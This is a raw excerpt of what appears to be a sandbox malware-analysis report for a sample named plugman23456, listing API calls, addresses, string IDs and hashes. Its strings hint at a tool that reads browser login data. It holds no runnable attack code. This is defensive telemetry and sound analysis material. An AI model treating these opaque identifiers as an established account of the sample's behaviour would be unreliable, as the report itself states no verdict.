                            • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                          • memset.MSVCRT ref: 00413BD7
                          • wcscpy.MSVCRT ref: 00413BF8
                          • CloseHandle.KERNEL32(?), ref: 00413C4E
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$wcscpy$CloseHandleOpenProcess
                          • String ID: 3A
                          • API String ID: 3300951397-293699754
                          • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                          • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                          • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                          • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                          APIs
                          • memset.MSVCRT ref: 00411AF6
                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                          • wcsrchr.MSVCRT ref: 00411B14
                          • wcscat.MSVCRT ref: 00411B2E
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FileModuleNamememsetwcscatwcsrchr
                          • String ID: AE$.cfg$General$EA
                          • API String ID: 776488737-1622828088
                          • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                          • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                          • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                          • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                          APIs
                          • memset.MSVCRT ref: 0040D8BD
                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                          • memset.MSVCRT ref: 0040D906
                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                          • _wcsicmp.MSVCRT ref: 0040D92F
                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                          • String ID: sysdatetimepick32
                          • API String ID: 1028950076-4169760276
                          • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                          • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                          • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                          • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID: -journal$-wal
                          • API String ID: 438689982-2894717839
                          • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                          • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                          • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                          • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                          • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                          • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                          • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                          • EndDialog.USER32(?,00000002), ref: 00405C83
                          • EndDialog.USER32(?,00000001), ref: 00405C98
                            • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                            • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                          • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Item$Dialog$MessageSend
                          • String ID:
                          • API String ID: 3975816621-0
                          • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                          • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                          • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                          • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                          APIs
                          • _wcsicmp.MSVCRT ref: 00444D09
                          • _wcsicmp.MSVCRT ref: 00444D1E
                          • _wcsicmp.MSVCRT ref: 00444D33
                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _wcsicmp$wcslen$_memicmp
                          • String ID: .save$http://$https://$log profile$signIn
                          • API String ID: 1214746602-2708368587
                          • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                          • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                          • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                          • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                          • String ID:
                          • API String ID: 2313361498-0
                          • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                          • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                          • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                          • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                          APIs
                          • GetClientRect.USER32(?,?), ref: 00405F65
                          • GetWindow.USER32(?,00000005), ref: 00405F7D
                          • GetWindow.USER32(00000000), ref: 00405F80
                            • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                          • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                          • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                          • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Window$ItemMessageRectSend$Client
                          • String ID:
                          • API String ID: 2047574939-0
                          • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                          • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                          • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                          • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                          • String ID:
                          • API String ID: 4218492932-0
                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                          APIs
                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                          • memcpy.MSVCRT ref: 0044A8BF
                          • memcpy.MSVCRT ref: 0044A90C
                          • memcpy.MSVCRT ref: 0044A988
                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                          • memcpy.MSVCRT ref: 0044A9D8
                          • memcpy.MSVCRT ref: 0044AA19
                          • memcpy.MSVCRT ref: 0044AA4A
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID: gj
                          • API String ID: 438689982-4203073231
                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                          APIs
                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043AC
                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043BF
                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043D3
                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043E7
                          • wcslen.MSVCRT ref: 0040BE06
                          • _wcsncoll.MSVCRT ref: 0040BE38
                          • memset.MSVCRT ref: 0040BE91
                          • memcpy.MSVCRT ref: 0040BEB2
                          • _wcsnicmp.MSVCRT ref: 0040BEFC
                          • wcschr.MSVCRT ref: 0040BF24
                          • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$FreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                          • String ID:
                          • API String ID: 1313804837-0
                          • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                          • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                          • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                          • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                          • API String ID: 3510742995-2446657581
                          • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                          • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                          • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                          • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                          • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                          • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                          • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                          • memset.MSVCRT ref: 00405ABB
                          • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                          • SetFocus.USER32(?), ref: 00405B76
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: MessageSend$FocusItemmemset
                          • String ID:
                          • API String ID: 4281309102-0
                          • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                          • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                          • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                          • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _snwprintfwcscat
                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                          • API String ID: 384018552-4153097237
                          • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                          • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                          • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                          • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ItemMenu$CountInfomemsetwcschr
                          • String ID: 0$6
                          • API String ID: 2029023288-3849865405
                          • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                          • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                          • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                          • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                          APIs
                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                          • memset.MSVCRT ref: 00405455
                          • memset.MSVCRT ref: 0040546C
                          • memset.MSVCRT ref: 00405483
                          • memcpy.MSVCRT ref: 00405498
                          • memcpy.MSVCRT ref: 004054AD
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$memcpy$ErrorLast
                          • String ID: 6$\
                          • API String ID: 404372293-1284684873
                          • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                          • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                          APIs
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                          • wcscpy.MSVCRT ref: 0040A0D9
                          • wcscat.MSVCRT ref: 0040A0E6
                          • wcscat.MSVCRT ref: 0040A0F5
                          • wcscpy.MSVCRT ref: 0040A107
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                          • String ID:
                          • API String ID: 1331804452-0
                          • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                          • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                          APIs
                          Strings
                          • <?xml version="1.0" ?>, xrefs: 0041007C
                          • <%s>, xrefs: 004100A6
                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$_snwprintf
                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                          • API String ID: 3473751417-2880344631
                          • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                          • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: wcscat$_snwprintfmemset
                          • String ID: %2.2X
                          • API String ID: 2521778956-791839006
                          • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                          • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _snwprintfwcscpy
                          • String ID: dialog_%d$general$menu_%d$strings
                          • API String ID: 999028693-502967061
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memsetstrlen
                          • String ID:
                          • API String ID: 2350177629-0
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                          • API String ID: 2221118986-1606337402
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcmpmemset$_mbscpymemcpystrlen
                          • String ID:
                          • API String ID: 265355444-0
                          APIs
                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                            • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                            • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                          • memset.MSVCRT ref: 0040C439
                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                          • _wcsupr.MSVCRT ref: 0040C481
                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                          • memset.MSVCRT ref: 0040C4D0
                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                          • String ID:
                          • API String ID: 1973883786-0
                          APIs
                          • memset.MSVCRT ref: 004116FF
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                          • API String ID: 2618321458-3614832568
                          APIs
                          • memset.MSVCRT ref: 004185FC
                          • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                          • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@AttributesFilememset
                          • String ID:
                          • API String ID: 776155459-0
                          APIs
                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                          • malloc.MSVCRT ref: 00417524
                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                          • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                          • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                          • String ID:
                          • API String ID: 2308052813-0
                          APIs
                          • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                          • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                          • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PathTemp$??3@
                          • String ID: %s\etilqs_$etilqs_
                          • API String ID: 1589464350-1420421710
                          APIs
                          • memset.MSVCRT ref: 0040FDD5
                            • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                          • _snwprintf.MSVCRT ref: 0040FE1F
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
